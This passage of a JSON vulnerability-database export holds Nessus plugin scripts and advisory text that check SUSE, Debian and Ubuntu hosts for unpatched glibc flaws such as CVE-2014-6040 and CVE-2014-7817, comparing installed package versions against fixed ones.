extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-03T12:18:14", "bulletinFamily": "scanner", "description": "glibc has been updated to fix security issues :\n\n - Fix crashes on invalid input in IBM gconv modules\n (CVE-2014-6040, CVE-2012-6656, bsc#894553, bsc#894556,\n GLIBC BZ #17325, GLIBC BZ #14134)\n\n - Fixed a stack overflow during hosts parsing\n (CVE-2013-4357)\n\n - Copy filename argument in\n posix_spawn_file_actions_addopen (CVE-2014-4043,\n bsc#882600, BZ #17048)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2015-0170-1.NASL", "href": "https://www.tenable.com/plugins/nessus/83675", "published": "2015-05-20T00:00:00", "title": "SUSE SLES10 Security Update : glibc (SUSE-SU-2015:0170-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2015:0170-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83675);\n script_version(\"2.8\");\n script_cvs_date(\"Date: 2019/09/11 11:22:11\");\n\n script_cve_id(\"CVE-2012-6656\", \"CVE-2013-4357\", \"CVE-2014-4043\", \"CVE-2014-6040\");\n script_bugtraq_id(67992, 68006, 69470, 69472);\n\n script_name(english:\"SUSE SLES10 Security Update : glibc (SUSE-SU-2015:0170-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"glibc has been updated to fix security issues :\n\n - Fix crashes on invalid input in IBM gconv modules\n (CVE-2014-6040, CVE-2012-6656, 
bsc#894553, bsc#894556,\n GLIBC BZ #17325, GLIBC BZ #14134)\n\n - Fixed a stack overflow during hosts parsing\n (CVE-2013-4357)\n\n - Copy filename argument in\n posix_spawn_file_actions_addopen (CVE-2014-4043,\n bsc#882600, BZ #17048)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=844309\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=882600\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=894553\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=894556\"\n );\n # https://download.suse.com/patch/finder/?keywords=1ccbe69cba5cc8835258525263c85657\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?18c9278a\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2012-6656/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2013-4357/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-6040/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20150170-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dcd4c243\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected glibc packages\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-info\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-locale\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES10)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES10\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES10\" && (! 
preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES10 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-32bit-2.4-31.115.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.4-31.115.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.4-31.115.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.4-31.115.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-32bit-2.4-31.115.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-devel-32bit-2.4-31.115.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-locale-32bit-2.4-31.115.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-profile-32bit-2.4-31.115.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"glibc-2.4-31.115.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"glibc-devel-2.4-31.115.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"glibc-html-2.4-31.115.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"glibc-i18ndata-2.4-31.115.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"glibc-info-2.4-31.115.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"glibc-locale-2.4-31.115.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"glibc-profile-2.4-31.115.2\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"4\", reference:\"nscd-2.4-31.115.2\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, 
tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:20:52", "bulletinFamily": "scanner", "description": "CVE-2012-6656\n\nFix validation check when converting from ibm930 to utf. When\nconverting IBM930 code with iconv(), if IBM930 code which includes\ninvalid multibyte character ", "modified": "2019-11-02T00:00:00", "id": "DEBIAN_DLA-97.NASL", "href": "https://www.tenable.com/plugins/nessus/82242", "published": "2015-03-26T00:00:00", "title": "Debian DLA-97-1 : eglibc security update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-97-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82242);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/07/09 14:30:25\");\n\n script_cve_id(\"CVE-2012-6656\", \"CVE-2014-6040\", \"CVE-2014-7817\");\n script_bugtraq_id(69470, 69472, 71216);\n\n script_name(english:\"Debian DLA-97-1 : eglibc security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2012-6656\n\nFix validation check when converting from ibm930 to utf. 
When\nconverting IBM930 code with iconv(), if IBM930 code which includes\ninvalid multibyte character '0xffff' is specified, then iconv()\nsegfaults.\n\nCVE-2014-6040\n\nCrashes on invalid input in IBM gconv modules [BZ #17325] These\nchanges are based on the fix for BZ #14134 in commit\n6e230d11837f3ae7b375ea69d7905f0d18eb79e5.\n\nCVE-2014-7817\n\nThe function wordexp() fails to properly handle the WRDE_NOCMD flag\nwhen processing arithmetic inputs in the form of '$((... ``))' where\n'...' can be anything valid. The backticks in the arithmetic\nexpression are evaluated in a shell even if WRDE_NOCMD forbade\ncommand substitution. This allows an attacker to attempt to pass\ndangerous commands via constructs of the above form, and bypass the\nWRDE_NOCMD flag. This patch fixes this by checking for WRDE_NOCMD in\nexec_comm(), the only place that can execute a shell. All other checks\nfor WRDE_NOCMD are superfluous and removed.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2014/11/msg00015.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze-lts/eglibc\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:eglibc-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:glibc-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc-dev-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-dev-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-dev-i386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-i386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-i686\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-pic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-prof\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libc6-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libnss-dns-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libnss-files-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:locales\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:locales-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"eglibc-source\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"glibc-doc\", 
reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc-bin\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc-dev-bin\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-amd64\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-dbg\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-dev\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-dev-amd64\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-dev-i386\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-i386\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-i686\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-pic\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-prof\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-udeb\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libc6-xen\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libnss-dns-udeb\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libnss-files-udeb\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"locales\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"locales-all\", reference:\"2.11.3-4+deb6u2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"nscd\", reference:\"2.11.3-4+deb6u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse 
audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-11-03T12:30:54", "bulletinFamily": "scanner", "description": "Siddhesh Poyarekar discovered that the GNU C Library incorrectly\nhandled certain multibyte characters when using the iconv function. An\nattacker could possibly use this issue to cause applications to crash,\nresulting in a denial of service. This issue only affected Ubuntu\n10.04 LTS and Ubuntu 12.04 LTS. (CVE-2012-6656)\n\nAdhemerval Zanella Netto discovered that the GNU C Library incorrectly\nhandled certain multibyte characters when using the iconv function. An\nattacker could possibly use this issue to cause applications to crash,\nresulting in a denial of service. (CVE-2014-6040)\n\nTim Waugh discovered that the GNU C Library incorrectly enforced the\nWRDE_NOCMD flag when handling the wordexp function. An attacker could\npossibly use this issue to execute arbitrary commands. (CVE-2014-7817).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "UBUNTU_USN-2432-1.NASL", "href": "https://www.tenable.com/plugins/nessus/79718", "published": "2014-12-04T00:00:00", "title": "Ubuntu 10.04 LTS / 12.04 LTS / 14.04 LTS / 14.10 : eglibc, glibc vulnerabilities (USN-2432-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2432-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79718);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/09/19 12:54:31\");\n\n script_cve_id(\"CVE-2012-6656\", \"CVE-2014-6040\", \"CVE-2014-7817\");\n script_bugtraq_id(69470, 69472, 71216);\n script_xref(name:\"USN\", value:\"2432-1\");\n\n script_name(english:\"Ubuntu 10.04 LTS / 12.04 LTS / 14.04 LTS / 14.10 : eglibc, glibc vulnerabilities (USN-2432-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Siddhesh Poyarekar discovered that the GNU C Library incorrectly\nhandled certain multibyte characters when using the iconv function. An\nattacker could possibly use this issue to cause applications to crash,\nresulting in a denial of service. This issue only affected Ubuntu\n10.04 LTS and Ubuntu 12.04 LTS. (CVE-2012-6656)\n\nAdhemerval Zanella Netto discovered that the GNU C Library incorrectly\nhandled certain multibyte characters when using the iconv function. An\nattacker could possibly use this issue to cause applications to crash,\nresulting in a denial of service. (CVE-2014-6040)\n\nTim Waugh discovered that the GNU C Library incorrectly enforced the\nWRDE_NOCMD flag when handling the wordexp function. An attacker could\npossibly use this issue to execute arbitrary commands. (CVE-2014-7817).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2432-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected libc6 package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libc6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/11/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2014-2019 Canonical, Inc. / NASL script (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(10\\.04|12\\.04|14\\.04|14\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04 / 12.04 / 14.04 / 14.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libc6\", pkgver:\"2.11.1-0ubuntu7.19\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"libc6\", pkgver:\"2.15-0ubuntu10.9\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libc6\", pkgver:\"2.19-0ubuntu6.4\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"libc6\", pkgver:\"2.19-10ubuntu2.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libc6\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-11-03T12:17:54", "bulletinFamily": "scanner", "description": "glibc has been updated to fix security issues and bugs :\n\n - Fix crashes on invalid input in IBM gconv modules.\n (CVE-2014-6040 / CVE-2012-6656, bsc#894553, bsc#894556,\n 
GLIBC BZ #17325, GLIBC BZ #14134)\n\n - Avoid infinite loop in nss_dns getnetbyname.\n (CVE-2014-9402)\n\n - Don", "modified": "2019-11-02T00:00:00", "id": "SUSE_11_GLIBC-150129.NASL", "href": "https://www.tenable.com/plugins/nessus/81295", "published": "2015-02-11T00:00:00", "title": "SuSE 11.3 Security Update : glibc (SAT Patch Number 10259)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81295);\n script_version(\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2016/02/28 05:39:56 $\");\n\n script_cve_id(\"CVE-2012-6656\", \"CVE-2014-6040\", \"CVE-2014-9402\");\n\n script_name(english:\"SuSE 11.3 Security Update : glibc (SAT Patch Number 10259)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"glibc has been updated to fix security issues and bugs :\n\n - Fix crashes on invalid input in IBM gconv modules.\n (CVE-2014-6040 / CVE-2012-6656, bsc#894553, bsc#894556,\n GLIBC BZ #17325, GLIBC BZ #14134)\n\n - Avoid infinite loop in nss_dns getnetbyname.\n (CVE-2014-9402)\n\n - Don't touch user-controlled stdio locks in forked child.\n (bsc#864081, GLIBC BZ #12847)\n\n - Unlock mutex before going back to waiting for PI\n mutexes. (bsc#891843, GLIBC BZ #14417)\n\n - Implement x86 cpuid handling of leaf4 for cache\n information. (bsc#903288, GLIBC BZ #12587)\n\n - Fix infinite loop in check_pf. 
(bsc#909053, GLIBC BZ\n #12926)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=864081\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=891843\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=894553\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=894556\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=903288\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=909053\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2012-6656.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-6040.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2014-9402.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 10259.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", 
